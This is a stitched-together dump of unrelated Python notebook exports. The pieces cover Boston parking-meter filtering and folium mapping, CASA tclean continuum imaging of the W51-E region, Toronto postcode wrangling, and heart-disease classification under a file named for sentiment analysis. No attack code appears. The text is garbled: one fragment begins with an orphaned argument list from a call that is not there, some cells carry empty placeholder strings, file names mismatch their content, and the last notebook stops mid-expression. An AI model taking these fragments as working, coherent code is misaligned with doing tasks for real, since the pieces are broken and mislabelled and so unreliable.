all_meters = no_na.append(charlestown_meters, sort=True)
# #### Filtering
# Sometimes you may only want data with certain attributes. You can filter the data and save to a new dataframe or delete data from the table. It can also be useful in cases where you want a count of the data that matches your query.
sun = all_meters[all_meters[''].str.contains('', na=False)]
print(sun)
#
# 
# One way to do this is to check if the cell contains a certain string (remember a string is a sequence of characters).
# syntax: *`dataframe[dataframe['column']`*`.str.contains(`*`'string we are looking for'`*`)]`
#
# This will return all result that evaluate to true. In the next example we want all the results that *do not contain* a certain string. We are in luck! We can easily invert our results by including *`~`* in front of the dataframe path like this: *`dataframe[~ dataframe['column']`*
#
#
#
# Some additional methods include `str.startswith("")` and `str.endswith("")`
#
# +
# let's find out what meters don't require payment on saturdays
# we have included the optional parameter "na=False" to exclude no data values, which can neither be true nor false
free_saturdays = all_meters[~ all_meters['PAY_POLICY'].str.contains('SAT', na=False)]
print(free_saturdays)
free_saturday = pd.DataFrame(free_saturdays).reset_index(drop=True)
# -
# # Reverse GeoCoding
locator = Nominatim(user_agent="test")
coordinates = "53.480837, -2.244914"
location = locator.reverse(coordinates)
location.raw
#create a dataframe geometry column which combines lat and long
free_saturday["geom"] = free_saturday["LATITUDE"].map(str) + "," + free_saturday["LONGITUDE"].map(str)
free_saturday.head()
# +
# Define reverse Geocoding function
locator = Nominatim(user_agent="free_parking_saturdays", timeout=10)
reverse_geocode = RateLimiter(locator.reverse, min_delay_seconds=.01)
#Create Address Column variable and call the function we created
free_saturday["address"] = free_saturday["geom"].apply(reverse_geocode)
#Check out results
free_saturday.head()
# -
# # Sep Lists in Columns
# ## Step 5: Mapping the Data
# #### Initializing the map
# Start by creating a map object. We need to start by specifying where the map should be and what basemap to use.
#
# Syntax:
# foilum.Map(location=[latitude, longitude], zoom_start = #, tiles='optional custom tiles')
#
# Note: Higher numbers correspond to higher zoom level
#
# +
# Base map centred on downtown Boston (Stamen Toner tiles).
# Renamed the variable from `map` so it no longer shadows the builtin map();
# it is not referenced by any later cell.
meter_map = folium.Map(location=[42.3621, -71.0570], zoom_start=14, tiles='Stamen Toner')

# One salmon circle marker per meter that is free on Saturdays; the popup
# shows the reverse-geocoded street address.
for _, meter in free_saturday.iterrows():
    try:
        location = [float(meter['LATITUDE']), float(meter['LONGITUDE'])]
        folium.CircleMarker(location=location, radius=10, popup=meter['address'],
                            color='#FA8072', fill=True,
                            fill_color='#FA8072').add_to(meter_map)
    except Exception as exception:
        # A meter with missing/bad coordinates shouldn't abort the whole
        # map; report it and keep going.
        print("exception:", exception)

meter_map
# -
# ## Step 6: Exporting Files
#
# Now we want to save the file we have just created. We could save it as a CSV, but suppose we need it in other formats? Let's write it out to a GeoJSON using built in functionality from the GeoPandas Library.
# Syntax:
# gdf = geopandas.GeoDataFrame(
# df, geometry=geopandas.points_from_xy(df.Longitude, df.Latitude))
# +
geo_dataframe = gp.GeoDataFrame(free_saturdays, geometry=gp.points_from_xy(free_saturdays.LONGITUDE, free_saturdays.LATITUDE))
print(geo_dataframe.head())
# -
geo_dataframe.to_file("", driver='GeoJSON')
ms=False,
cfcache="", usepointing=False, computepastep=360.0, rotatepastep=360.0,
pointingoffsetsigdev=[], pblimit=0.1, normtype="flatnoise",
deconvolver="mtmfs", scales=[0, 3, 9], nterms=2, smallscalebias=0.0,
restoration=True, restoringbeam=[], pbcor=True, outlierfile="",
weighting="briggs", robust=0, noise="1.0Jy", npixels=0, uvtaper=[],
niter=10000, gain=0.1, threshold="0.2mJy", nsigma=0.0, cycleniter=-1,
cyclefactor=1.0, minpsffraction=0.05, maxpsffraction=0.8,
interactive=False, usemask="user",
mask="../reduction/reduction/clean_regions/W51E_Bright.crtf",
pbmask=0.0,
sidelobethreshold=3.0, noisethreshold=5.0, lownoisethreshold=1.5,
negativethreshold=0.0, smoothfactor=1.0, minbeamfrac=0.3,
cutthreshold=0.01, growiterations=75, dogrowprune=True,
minpercentchange=-1.0, verbose=False, fastnoise=True, restart=True,
savemodel="none", calcres=True, calcpsf=True, parallel=False)
# CASA tclean: final-iteration continuum imaging of W51-E (Band 3, 12M array,
# briggs robust=0, self-cal iteration 7).  `startmodel` restarts the multi-term
# multi-scale (mtmfs, nterms=2) deconvolution from the previously
# self-calibrated tt0/tt1 model images instead of starting from scratch, and
# cleaning is restricted to the bright-region mask file.
tclean(vis=selfcal_ms,
       selectdata=True, field="W51-E", spw="", timerange="", uvrange="",
       antenna="DA41,DA42,DA43,DA44,DA45,DA46,DA47,DA49,DA50,DA51,DA52,DA53,DA54,DA55,DA56,DA57,DA58,DA59,DA61,DA62,DA63,DA65,DV01,DV03,DV04,DV06,DV07,DV08,DV09,DV10,DV11,DV12,DV13,DV14,DV15,DV16,DV17,DV19,DV20,DV23,DV24,DV25,PM01,PM02,PM03,DA60,DA64,DV05,DV22,DA48,DA49,DA51,DA60,DV01,DV15,DV23,PM03,PM04,DA53,DA46,DV10,DA42,DA43,DA44,DA45,DA46,DA47,DA50,DA51,DA55,DA56,DA57,DA58,DA61,DA62,DV02,DV03,DV07,DV11,DV12,DV14,DV19,DV21",
       scan="", observation="", intent="", datacolumn="corrected",
       imagename="imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_dec17ms_clean",
       imsize=[4800, 4800], cell=['0.0375arcsec', '0.0375arcsec'],
       phasecenter="ICRS 290.934083333deg 14.5081943683deg",
       stokes="I",
       projection="SIN",
       startmodel=['imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7.model.tt0',
                   'imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7.model.tt1'],
       specmode="mfs", reffreq="", nchan=-1, start="",
       width="", outframe="LSRK", veltype="radio", restfreq=[],
       interpolation="linear", perchanweightdensity=True, gridder="mosaic",
       facets=1, chanchunks=1, wprojplanes=1, vptable="",
       mosweight=True, aterm=True, psterm=False, wbawp=True, conjbeams=False,
       cfcache="", usepointing=False, computepastep=360.0, rotatepastep=360.0,
       pointingoffsetsigdev=[], pblimit=0.1, normtype="flatnoise",
       deconvolver="mtmfs", scales=[0, 3, 9], nterms=2, smallscalebias=0.0,
       restoration=True, restoringbeam=[], pbcor=True, outlierfile="",
       weighting="briggs", robust=0, noise="1.0Jy", npixels=0, uvtaper=[],
       niter=10000, gain=0.1, threshold="0.2mJy", nsigma=0.0, cycleniter=-1,
       cyclefactor=1.0, minpsffraction=0.05, maxpsffraction=0.8,
       interactive=False, usemask="user",
       mask="../reduction/reduction/clean_regions/W51E_Bright.crtf",
       pbmask=0.0,
       sidelobethreshold=3.0, noisethreshold=5.0, lownoisethreshold=1.5,
       negativethreshold=0.0, smoothfactor=1.0, minbeamfrac=0.3,
       cutthreshold=0.01, growiterations=75, dogrowprune=True,
       minpercentchange=-1.0, verbose=False, fastnoise=True, restart=True,
       savemodel="none", calcres=True, calcpsf=True, parallel=False)
finaliter_prefix = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_non2h_brightmask_dirty"
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,5",5")'
pl.figure(figsize=(22,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,1).imshow(image[0].value, norm=simple_norm(image[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt0")
imagett1 = SpectralCube.read(f'{finaliter_prefix}.image.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,2).imshow(imagett1[0].value, norm=simple_norm(imagett1[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt1")
residual = SpectralCube.read(f'{finaliter_prefix}.residual.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,6).imshow(residual[0].value, norm=simple_norm(residual[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt0")
residualtt1 = SpectralCube.read(f'{finaliter_prefix}.residual.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,7).imshow(residualtt1[0].value, norm=simple_norm(residualtt1[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt1")
alpha = SpectralCube.read(f'{finaliter_prefix}.alpha', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,3).imshow(alpha[0].value, norm=simple_norm(alpha[0].value, stretch='linear', min_cut=-2, max_cut=4));
pl.title("alpha")
model = SpectralCube.read(f'{finaliter_prefix}.model.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,4).imshow(model[0].value, norm=simple_norm(model[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt0")
modeltt1 = SpectralCube.read(f'{finaliter_prefix}.model.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,5).imshow(modeltt1[0].value, norm=simple_norm(modeltt1[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt1")
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,35",35")'
pl.figure(figsize=(22,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,1).imshow(image[0].value, norm=simple_norm(image[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt0")
imagett1 = SpectralCube.read(f'{finaliter_prefix}.image.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,2).imshow(imagett1[0].value, norm=simple_norm(imagett1[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt1")
residual = SpectralCube.read(f'{finaliter_prefix}.residual.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,6).imshow(residual[0].value, norm=simple_norm(residual[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt0")
residualtt1 = SpectralCube.read(f'{finaliter_prefix}.residual.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,7).imshow(residualtt1[0].value, norm=simple_norm(residualtt1[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt1")
alpha = SpectralCube.read(f'{finaliter_prefix}.alpha', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,3).imshow(alpha[0].value, norm=simple_norm(alpha[0].value, stretch='linear', min_cut=-2, max_cut=4));
pl.title("alpha")
model = SpectralCube.read(f'{finaliter_prefix}.model.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,4).imshow(model[0].value, norm=simple_norm(model[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt0")
modeltt1 = SpectralCube.read(f'{finaliter_prefix}.model.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,5).imshow(modeltt1[0].value, norm=simple_norm(modeltt1[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt1")
pipeline_pfx = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter"
pipe_image = SpectralCube.read(f'{pipeline_pfx}.image.tt0', format='casa_image')
# +
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,45",65")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# -
finaliter_prefix = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_non2h_brightmask_clean"
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
# +
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,45",65")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# +
cutoutregion = 'fk5; box(19:23:43.93,+14:30:27.8,6",7")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# -
# ls -d imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_dec17ms*
# +
finaliter_prefix = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_dec17ms_dirty"
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
cutoutregion = 'fk5; box(19:23:42.93,+14:30:34.8,45",65")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# -
| 21,466 |
/TorontoNeighbourhood_version2.ipynb
|
9bc1e1ae0221a3896465865229040b542692fb08
|
[] |
no_license
|
gabrielmergea/Coursera_Capstone-1
|
https://github.com/gabrielmergea/Coursera_Capstone-1
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 98,554 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python3
# ---
import pandas as pd
import pylab as pl
import numpy as np
# # Q1 DataFrame
# I convert the Wikipedia' table into csv file
# +
# The code was removed by Watson Studio for sharing.
# -
df.shape
import re
# Drop rows whose borough was never assigned.
df = df[~df['Borough'].str.contains('Not assigned')]
print(type(df['Neighbourhood']))
# Group by postcode+borough and collect the unique neighbourhood names.
# NOTE: `by` must be a *list* of column names; modern pandas treats a tuple
# as one composite key and raises KeyError.
new_df = df.groupby(by=['Postcode', 'Borough'])
print(new_df['Neighbourhood'])
new_df = new_df['Neighbourhood'].unique()
new_df = pd.DataFrame(new_df)
new_df = new_df.reset_index(level=0)
new_df = new_df.reset_index(level=0)
new_df
# `.ix` was removed in pandas 1.0 -- label-based `.loc` is the replacement.
new_df.loc[1, 'Neighbourhood']
# +
# Replace 'Not assigned' neighbourhoods with their borough name.
for i in new_df.index:
    if 'Not assigned' in new_df.loc[i, 'Neighbourhood']:
        new_df.loc[i, 'Neighbourhood'] = new_df.loc[i, 'Borough']
new_df
# -
new_df = new_df.reindex(columns=['Postcode', 'Borough', 'Neighbourhood'])
new_df.rename(columns={'Postcode': 'PostalCode'}, inplace=True)
new_df
new_df.shape
# # Q2 Get longitude and latitude
# I choose to read the csv file
df_geo = pd.read_csv('https://cocl.us/Geospatial_data')
df_geo.rename(columns = {"Postal Code" : 'PostalCode'}, inplace = True)
df_geo
new_df['PostalCode'].astype(str)
new_df['PostalCode'] = new_df['PostalCode'].astype(str)
df_geo['PostalCode'] = df_geo['PostalCode'].astype(str)
new2_df = pd.merge(new_df, df_geo, on = 'PostalCode')
new2_df
| 1,577 |
/SENTIMENT_ANALYSIS.ipynb
|
0be080f3e26c86f04aba5e4d2135bbcad8fa4ba1
|
[] |
no_license
|
pratikshanikum16/SENTIMENT-ANALYSIS
|
https://github.com/pratikshanikum16/SENTIMENT-ANALYSIS
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 7,854 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from scipy.stats import gaussian_kde
import seaborn
import plotly
import plotly.graph_objs as go
from plotly import tools
import plotly.figure_factory as ff
############## OFFLINE ##############
plotly.offline.init_notebook_mode(connected=True)
#to plot offline: ##plotly.offline.iplot##
############## ONLINE ##############
#plotly.tools.set_credentials_file(username='arnaurovira23', api_key='7y46ugRJ8Rl6XCkCwBGM')
#to plot online: ##py.iplot##
import plotly.plotly as py
import warnings
warnings.filterwarnings('ignore')
# -
# ### target dataset
df_target = pd.read_csv('train_lables.txt')
df_target.head()
print(f' How many unique values are in target column? {len(df_target.heart_disease_present.unique())}')
df_target['heart_disease_present'].unique()
#Shape of target dataset
num_target = df_target.shape[0]
print(num_target)
# ### train dataset
df_train = pd.read_csv('train_values.txt')
df_train.head()
df_train.describe()
#Shape of train dataset
num_train = df_train.shape[0]
print(f' Shpae of dataset train: {num_train}')
# ##### features
features_all = df_train.columns.tolist()
features_all.remove('patient_id')
print(features_all)
print(len(features_all))
print(f'How many NaN values are in df_train set? {df_train.isnull().sum().sum()}')
print(f'How many unique values are in thal column? {len(df_train.thal.unique())}')
print(df_train['thal'].unique())
df_train.info()
# ### test dataset
df_test = pd.read_csv('test_values.txt')
df_test.head()
#Shape of test dataset
num_test = df_test.shape[0]
print(f' Shpae of dataset test: {num_test}')
df_test.describe()
df_test.info()
print(f'How many NaN values are in df_test set? {df_test.isnull().sum().sum()}')
print(f'How many unique values are in thal column? {len(df_test.thal.unique())}')
print(df_test['thal'].unique())
features_all_test = df_test.columns.tolist()
features_all_test.remove('patient_id')
print(features_all_test)
print(len(features_all_test))
# ### merge train & target dataset
df_final = df_train.merge(df_target, on = 'patient_id' , how = 'left')
df_final.head()
df_final.dtypes
# ##### features dataset final
df_final['heart_disease_present'].value_counts()
targets = df_final['heart_disease_present'].unique()
num_targets = len(targets)
print(targets)
print(num_targets)
features_num = df_final.select_dtypes(include=['int64','float']).columns.to_list()
features_num.remove('heart_disease_present')
print(features_num)
print(len(features_num))
df_final['heart_disease_present'].value_counts()
# +
targets_plot = [go.Bar(y = df_final['heart_disease_present'].value_counts(),\
marker = dict(color = ['rgba(204,204,204,1)', 'rgba(222,45,38,0.8)']))]
layout = go.Layout(title='heart_disease_present Count',width=400, height=400, xaxis= dict(dtick=1))
fig = go.Figure(targets_plot, layout=layout)
plotly.offline.iplot(fig)
# -
# ### Train vs test comparision
# +
fig, axs = plt.subplots(3, 4, figsize=(40, 20))
axs = axs.flatten()
for i, (ax, feature) in enumerate(zip(axs, features_num)):
sns.kdeplot(df_train[feature], label="train", ax=ax)
sns.kdeplot(df_test[feature], label="test", ax=ax)
ax.set_title(feature)
sns.set(font_scale=3)
sns.set_style("ticks")
ax.legend(frameon=False)
plt.tight_layout()
# -
# # EDA
features_count = ['resting_ekg_results','slope_of_peak_exercise_st_segment','chest_pain_type','num_major_vessels','fasting_blood_sugar_gt_120_mg_per_dl','sex','exercise_induced_angina']
features_kde = [ 'resting_blood_pressure', 'serum_cholesterol_mg_per_dl', 'oldpeak_eq_st_depression', 'age', 'max_heart_rate_achieved']
# +
fig, axs = plt.subplots(ncols = 5, figsize=(20, 6))
axs = axs.flatten()
for i, (ax, feature) in enumerate(zip(axs, features_kde)):
sns.kdeplot(df_final[df_final['heart_disease_present']==0][feature], label = 0, ax=ax)
sns.kdeplot(df_final[df_final['heart_disease_present']==1][feature], label = 1, ax=ax)
ax.set_title(feature)
sns.set(font_scale=1.5)
sns.set_style("ticks")
ax.legend(frameon=False)
plt.tight_layout()
# +
fig, axs = plt.subplots(2,4,figsize=(30,15))
axs = axs.flatten()
for i,(ax, feature) in enumerate (zip(axs, features_count)):
gb_0 = df_final[[feature, 'heart_disease_present']][df_final['heart_disease_present'] == 0].groupby(feature).count().rename(columns = {'heart_disease_present':'0'})
gb_1 = df_final[[feature, 'heart_disease_present']][df_final['heart_disease_present'] == 1].groupby(feature).count().rename(columns = {'heart_disease_present':'1'})
gb_plot = gb_0.merge(gb_1, on = feature).reset_index()
gb_plot = pd.melt(gb_plot, id_vars = feature, value_vars=['0','1']).rename(columns = {'variable':'heart_disease_present'})
sns.barplot(data = gb_plot, x = feature , y='value' ,hue = 'heart_disease_present', ax = ax)
sns.set(font_scale=1.5)
sns.set_style("ticks")
ax.legend(frameon=False)
plt.tight_layout()
# -
# ### combine target and test set
df_combine = pd.concat([df_final, df_test], sort = False)
len_train = df_train.shape[0]
len_test = df_test.shape[0]
# ### dummies EDA
feature_dummies = ['thal_fixed_defect','thal_normal','thal_reversible_defect']
df_combine = pd.get_dummies(df_combine, columns = ['thal'])
df_final[['thal','heart_disease_present']].groupby('thal').mean()
fig, axs = plt.subplots(figsize=(20,6),ncols=3)
for i,feature in enumerate (feature_dummies):
count = df_combine[:len_train][[feature,'heart_disease_present']].groupby('heart_disease_present').sum().reset_index()
sns.barplot(data = count, x = 'heart_disease_present', y = feature, ax = axs[i])
sns.set(font_scale=1)
sns.set_style("ticks")
# # Feature engineering
# ##### Dummies
df_combine = pd.get_dummies(df_combine, columns=['slope_of_peak_exercise_st_segment','chest_pain_type','num_major_vessels'])
df_combine.head()
# # Feature correlation
features_corr = df_train_final = df_combine[:len_train].select_dtypes(include=['int','float','uint8']).columns.to_list()
features_corr
# ##### Pearson correlation
# +
# Compute Pearson correlation for every pair of features
# Use only training data
pcorrs = pd.DataFrame(df_combine[:len_train][features_corr].corr()['heart_disease_present'].sort_values()).reset_index()
pcorrs = pcorrs.rename(columns = {'index':'feature', 'heart_disease_present':'pcorr'})
print('Most negatively correlated variables:')
pcorrs.head()
# -
print('Most positively correlated variables:')
pcorrs.tail()
# ##### Spearman correlation
# +
# Compute Spearman correlation for every features
# Use only training data
from scipy.stats import spearmanr
feats = []
scorr = []
pvalues = []
for feat in features_corr:
# Calculate spearman correlation
scorr.append(spearmanr(df_combine[:len_train][feat], df_combine[:len_train]['heart_disease_present']).correlation)
pvalues.append(spearmanr(df_combine[:len_train][feat], df_combine[:len_train]['heart_disease_present']).pvalue)
scorrs = pd.DataFrame({'feature': features_corr, 'scorr':scorr, 'pvalue':pvalues}).sort_values('scorr')
print('Most negatively correlated variables:')
scorrs.head()
# -
print('Most positively correlated variables:')
scorrs.tail()
# ##### Compute features for which Pearson and Spearman correlation differs the most
corrs = pcorrs.merge(scorrs, on = 'feature')
corrs['diff'] = corrs['pcorr'] - corrs['scorr']
corrs.sort_values('diff')
plt.figure(figsize=(15, 10))
sns.set(font_scale=0.75)
sns.heatmap(df_combine[:len_train][features_corr].corr(), square=True, cmap='RdYlGn',annot=True,annot_kws={'size': 5},fmt='.2f')
# ###### drop most related features
df_combine.drop(columns = ['thal_normal','resting_blood_pressure'], inplace = True)
df_combine.head()
# Anomanar datasets per model prediction
df_train_final = df_combine[:len_train]
df_test_final = df_combine[len_train:]
# # Model and prediction
# +
from sklearn.model_selection import cross_val_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import train_test_split
from sklearn.metrics import log_loss, confusion_matrix, classification_report, roc_auc_score, roc_curve, make_scorer, f1_score
from sklearn.preprocessing import MinMaxScaler, Normalizer, StandardScaler, PolynomialFeatures
from sklearn.feature_selection import SelectFromModel
from sklearn.pipeline import Pipeline
from sklearn.model_selection import StratifiedKFold, KFold
# Since the dataset is class-balanced, we can use macro averaging for the F1 scorer
scorer = make_scorer(f1_score, greater_is_better=True, average = 'macro')
# +
# Extract training data and labels
train_set = df_train_final.drop(columns = ['patient_id','heart_disease_present'])
test_set = df_test_final.drop(columns = ['patient_id','heart_disease_present'])
test_ids = df_test_final['patient_id'].values
train_labels = np.asarray(df_train_final['heart_disease_present'])
[num_examples,num_feat] = train_set.shape
# Submission base which is used for making submissions to the competition
submission_base = df_combine[len_train:][['patient_id']].copy()
print(train_set.shape)
print(test_set.shape)
print(train_labels.shape)
# -
# Using stratified kfold cross validation
nfolds = 10
strkfold = StratifiedKFold(n_splits = nfolds, shuffle = True)
# ##### Routine to train a model with cross-validation and append the results to a dataframe
# +
model_results = pd.DataFrame(columns=['model', 'cv_scores'])


def run_cv_model_f1(model, train_set, train_labels, name, model_results=None):
    """Cross-validate *model* with the shared stratified K-fold and F1 scorer.

    Prints the mean/std F1 across folds.  When *model_results* is given,
    one row per fold is appended and the grown frame is returned;
    otherwise returns None.

    Parameters
    ----------
    model : scikit-learn style estimator.
    train_set, train_labels : training features and targets.
    name : str label recorded in the 'model' column.
    model_results : optional DataFrame with columns ['model', 'cv_scores'].
    """
    # `strkfold` and `scorer` are module-level, defined in earlier cells.
    cv_scores = cross_val_score(model, train_set, train_labels,
                                cv=strkfold, scoring=scorer)
    # Single-line message: the original used a backslash continuation inside
    # the f-string, which leaked the wrapped line's whitespace into the text.
    print(f'{strkfold.n_splits}-Fold Cross Validation F1 Score = '
          f'{round(cv_scores.mean(), 4)} with std = {round(cv_scores.std(), 4)}')
    if model_results is not None:
        # DataFrame.append was removed in pandas 2.0 -- use pd.concat.
        model_results = pd.concat(
            [model_results,
             pd.DataFrame({'model': name, 'cv_scores': cv_scores})],
            ignore_index=True)
    return model_results
# +
model_logloss = pd.DataFrame(columns=['model', 'Neglogloss_scores'])


def run_cv_model_logloss(model, train_set, train_labels, name, model_logloss=None):
    """Cross-validate *model* and report the (positive) log loss.

    scikit-learn's 'neg_log_loss' scorer returns negated values, so scores
    are multiplied by -1 before printing/recording.  When *model_logloss*
    is given, one row per fold is appended and the grown frame is returned;
    otherwise returns None.
    """
    # `strkfold` is module-level, defined in an earlier cell.
    cv_scores = cross_val_score(model, train_set, train_labels,
                                cv=strkfold, scoring='neg_log_loss')
    # Single-line message: the original's backslash continuation inside the
    # f-string leaked the wrapped line's whitespace into the text.
    print(f'{strkfold.n_splits}-Fold Cross Validation Neg Log Loss = '
          f'{round(-1*(cv_scores.mean()), 4)} with std = {round(cv_scores.std(), 4)}')
    if model_logloss is not None:
        # DataFrame.append was removed in pandas 2.0 -- use pd.concat.
        model_logloss = pd.concat(
            [model_logloss,
             pd.DataFrame({'model': name, 'Neglogloss_scores': -1*(cv_scores)})],
            ignore_index=True)
    return model_logloss
# -
# ##### Routine to plot feature importances
def plot_feature_importance (df, n = 10, threshold = None):
    """Plots n most important features. Also plots the cumulative importance if
    threshold is specified and prints the number of features needed to reach
    threshold cumulative importance. Intended for use with any tree-based
    feature importances.

    Args:
        df (dataframe): Dataframe of feature importances. Columns must be
            "feature" and "importance".
        n (int): Number of most important features to plot. Default is 10.
        threshold (float): Threshold for cumulative importance plot. If not
            provided, no plot is made. Default is None.

    Returns:
        df (dataframe): Dataframe ordered by feature importances with a
            normalized column (sums to 1) and a cumulative importance column.

    Note:
        * Normalization in this case means sums to 1.
        * Cumulative importance is calculated by summing features from most
          to least important.
        * A threshold of x will show the most important features needed to
          reach 100*x% of cumulative importance.
    """
    # Sort features with most important at the head
    df = df.sort_values('importance', ascending = False).reset_index(drop = True)
    # Normalize the feature importances to add up to one and calculate cumulative importance
    df['importance_normalized'] = df['importance']/df['importance'].sum()
    df['cumulative_importance'] = np.cumsum(df['importance_normalized'])
    # Bar plot of n most important features
    # NOTE(review): .loc label slicing is inclusive, so rows 0..n (n+1 bars)
    # are plotted, not n -- confirm whether this is intended.
    trace0 = go.Bar(y = df.loc[:n, 'feature'],\
                    x = df.loc[:n, 'importance_normalized'],\
                    marker = dict(color = 'rgba(50, 171, 96, 0.6)',\
